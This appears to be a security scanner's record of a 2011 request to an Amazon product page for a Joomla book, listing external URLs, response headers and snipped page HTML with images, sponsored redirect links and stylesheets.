http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:19 GMT
Server: Server
x-amz-id-1: 1GMNYJAKA4TJD7BE20PT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: rRZgZjI7evzN2uK+PGBNvEWrhG1Qajm2TBox690BsTrGBbLn0XvjcMMT1QA/Cp32
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
Content-Length: 407243

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41je00SqqhL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0596804946"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0596804946/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41je00SqqhL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Using Joomla: Building Powerful and Efficient Web Sites" onmouseover="" /></a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=" rel="nofollow">Create a <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink"><b>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.lynda.com</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=" rel="nofollow">Verizon Official <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">verizon.com/SmallBusiness</a>
...[SNIP]...
<a href="http://www.amazon.com/Using-Joomla-Building-Powerful-Efficient/dp/0596804946/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41je00SqqhL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Using Joomla: Building Powerful and Efficient Web Sites" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-1-5-Building-Successful-Powered/dp/0137012314/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Joomla! 1.5: A User's Guide: Building a Successful Joomla! Powered Website (2nd Edition)" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-Start-Finish-Maintain-Programmer/dp/047057089X/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Joomla! Start to Finish: How to Plan, Execute, and Maintain Your Web Site (Wrox Programmer to Programmer)" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51-3onLAtSL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ERW1EpDfL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41nA%2B5xP9aL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51%2Bj7YLtawL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41je00SqqhL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Using Joomla: Building Powerful and Efficient Web Sites" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-1-5-Building-Successful-Powered/dp/0137012314/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0137012314" ><img src="http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Joomla! 1.5: A User's Guide: Building a Successful Joomla! Powered Website (2nd Edition)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-Dummies-Steve-Holzner-Ph-D/dp/047043287X/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_047043287X" ><img src="http://ecx.images-amazon.com/images/I/51-3onLAtSL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Joomla! For Dummies" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-Start-Finish-Maintain-Programmer/dp/047057089X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_047057089X" ><img src="http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Joomla! Start to Finish: How to Plan, Execute, and Maintain Your Web Site (Wrox Programmer to Programmer)" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
